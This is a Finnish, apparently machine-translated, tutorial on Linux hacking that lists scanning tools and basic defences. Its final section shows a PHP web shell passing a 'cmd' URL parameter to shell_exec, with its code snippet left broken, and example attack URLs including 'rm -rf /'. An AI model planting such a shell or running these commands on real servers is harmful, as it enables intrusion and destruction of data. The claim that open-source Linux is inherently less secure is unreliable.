Linux on eniten käytetty palvelinkäyttöjärjestelmä, etenkin verkkopalvelimille. Se on avoimen lähdekoodin; tämä tarkoittaa, että jokaisella voi olla pääsy lähdekoodiin. Tämä tekee siitä vähemmän turvallisen verrattuna muihin käyttöjärjestelmiin, koska hyökkääjät voivat tutkia lähdekoodia löytääkseen haavoittuvuuksia . Hackers-Linux on kyse näiden haavoittuvuuksien hyödyntämisestä järjestelmän luvattoman käytön saamiseksi.
Tässä artikkelissa esittelemme sinulle, mitä Linux on, sen tietoturva-aukkoja, hakkerointia Ubuntun kanssa ja vastaavia toimenpiteitä, jotka voit ottaa käyttöön.
Tämän opetusohjelman aiheet
- Pikaohje Linuxissa
- Linux-hakkerointityökalut
- Kuinka estää Linux-hakkereita
- Hakkerointi: Hack Linux-järjestelmä PHP: n avulla
Pikaohje Linuxissa
Linux on avoimen lähdekoodin käyttöjärjestelmä . Linux-pohjaisten käyttöjärjestelmien, kuten Redhat, Fedora ja Ubuntu, jakeluita on monia. Toisin kuin muut käyttöjärjestelmät, Linux on vähemmän turvallinen turvallisuuden suhteen. Tämä johtuu siitä, että lähdekoodi on vapaasti saatavilla, joten sitä on helppo tutkia haavoittuvuuksien varalta ja hyödyntää niitä muihin käyttöjärjestelmiin, jotka eivät ole avointa lähdekoodia. Linuxia voidaan käyttää palvelimen, työpöydän, tabletin tai mobiililaitteen käyttöjärjestelmänä.
Linux-ohjelmia voidaan käyttää joko käyttöliittymän tai komentojen avulla. Kali Linux-hakkeroinnin Linux-komennot ovat tehokkaampia ja vaikuttavampia kuin käyttöliittymän käyttö. Tästä syystä se auttaa tuntemaan hakkeroinnin Linux-perustiedot.
Katso nämä oppaat https://www.guru99.com/unix-linux-tutorial.html siitä, miten pääset alkuun Kali Linux-hakkeroiden kanssa.
Linux-hakkerointityökalut
- Nessus - tätä työkalua voidaan käyttää Ubuntu-hakkerointiin, skannausasetusten asetuksiin, korjaustiedostoihin ja verkkoihin jne. Se löytyy osoitteesta https://www.tenable.com/products/nessus
- NMap. Tätä työkalua voidaan käyttää palvelimessa käynnissä olevien isäntien ja niiden käyttämien palvelujen seurantaan. Sitä voidaan käyttää myös porttien etsimiseen. Se löytyy osoitteesta https://nmap.org/
- SARA - SARA on lyhenne sanoista Security Auditor's Research Assistant. Kuten nimestä käy ilmi, tätä työkalua voidaan käyttää verkkojen tarkastamiseen uhkia vastaan, kuten SQL Injection, XSS jne. Se löytyy osoitteesta http://www-arc.com/sara/sara.html
Yllä oleva luettelo ei ole tyhjentävä; se antaa sinulle käsityksen työkaluista, jotka ovat käytettävissä Ubuntun hakkerointiin ja hakkerointiin Linux-järjestelmissä.
Kuinka estää Linux-hakkereita
Linux-hakkerointi hyödyntää käyttöjärjestelmän haavoittuvuuksia. Organisaatio voi noudattaa seuraavaa käytäntöä suojautuakseen hyökkäyksiltä.
- Korjausten hallinta - korjaustiedostot korjaavat virheet, joita hyökkääjät käyttävät järjestelmän vaarantamiseksi. Hyvä korjaustiedostojen hallintakäytäntö varmistaa, että käytät jatkuvasti asiaankuuluvia korjaustiedostoja järjestelmääsi.
- Oikea käyttöjärjestelmän määritys - muut hyödyntämiset hyödyntävät palvelimen kokoonpanon heikkouksia. Passiiviset käyttäjätunnukset ja demonit on poistettava käytöstä. Oletusasetuksia, kuten sovelluksen yleisiä salasanoja, oletusnimiä ja joitain porttinumeroita, tulisi muuttaa.
- Tunkeutumisen havaitsemisjärjestelmä - tällaisia työkaluja voidaan käyttää järjestelmän luvattoman käytön havaitsemiseen. Jotkut työkalut pystyvät havaitsemaan ja estämään tällaiset hyökkäykset.
Hakkerointi: Hakkeroi Ubuntu Linux -järjestelmä PHP: n avulla
Tässä käytännön skenaariossa opimme hakkeroinnin Ubuntun kanssa ja annamme sinulle perustiedot siitä, kuinka voit käyttää PHP: tä Linuxin vaarantamiseen. Emme aio kohdistaa kenellekään uhrille. Jos haluat kokeilla sitä, voit asentaa LAMPPin paikalliselle koneellesi.
PHP: ssä on kaksi toimintoa, joita voidaan käyttää Linuxin hakkerointikomentojen suorittamiseen. Siinä on toiminnot exec () ja shell_exec (). Funktio exec () palauttaa komennon viimeisen rivin, kun taas shell_exec () palauttaa komennon koko tuloksen merkkijonona.
Oletetaan, että hyökkääjän ylläpitäjät lähettävät esittelytarkoituksessa seuraavan tiedoston verkkopalvelimeen.
$cmd";$output = shell_exec($cmd);echo "$output";?>
TÄSSÄ,
Yllä oleva komentosarja saa komennon GET-muuttujalta nimeltä cmd. Komento suoritetaan käyttämällä shell_exec () -ominaisuutta ja tulokset palautetaan selaimessa.
Yllä olevaa koodia voidaan hyödyntää seuraavalla URL-osoitteella
http: //localhost/cp/konsole.php? cmd = ls% 20-l
TÄSSÄ,
- ”… Konsole.php? Cmd = ls% 20-l” määrittää arvon ls -l muuttujalle cmd .
Palvelinta hakkeroiva Ubuntun komento suoritetaan muodossa
shell_exec('ls -l') ;
Yllä olevan koodin suorittaminen Web-palvelimella tuottaa samanlaisia tuloksia kuin seuraava.
Yllä oleva komento näyttää vain tiedostot nykyisessä hakemistossa ja käyttöoikeudet
Oletetaan, että hyökkääjä läpäisee seuraavan komennon
rm -rf /
TÄSSÄ,
- “Rm” poistaa tiedostot
- “Rf” saa rm-komennon toimimaan rekursiivisessa tilassa. Kaikkien kansioiden ja tiedostojen poistaminen
- “/” Kehottaa komentoa aloittamaan tiedostojen poistamisen juurihakemistosta
Hyökkäyksen URL-osoite näyttää tältä
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Yhteenveto
- Linux on suosittu käyttöjärjestelmä palvelimille, työasemille, tableteille ja mobiililaitteille.
- Linux on avoimen lähdekoodin, ja lähdekoodin voi saada kuka tahansa. Tämä tekee haavoittuvuuksien löytämisestä helppoa. Se on yksi parhaista käyttöjärjestelmistä hakkereille.
- Ubuntun perus- ja verkkohakkerointikomennot ovat arvokkaita Linux-hakkereille.
- Haavoittuvuudet ovat heikkous, jota voidaan hyödyntää järjestelmän vaarantamiseksi.
- Hyvä suojaus voi auttaa suojaamaan järjestelmää hyökkääjiltä.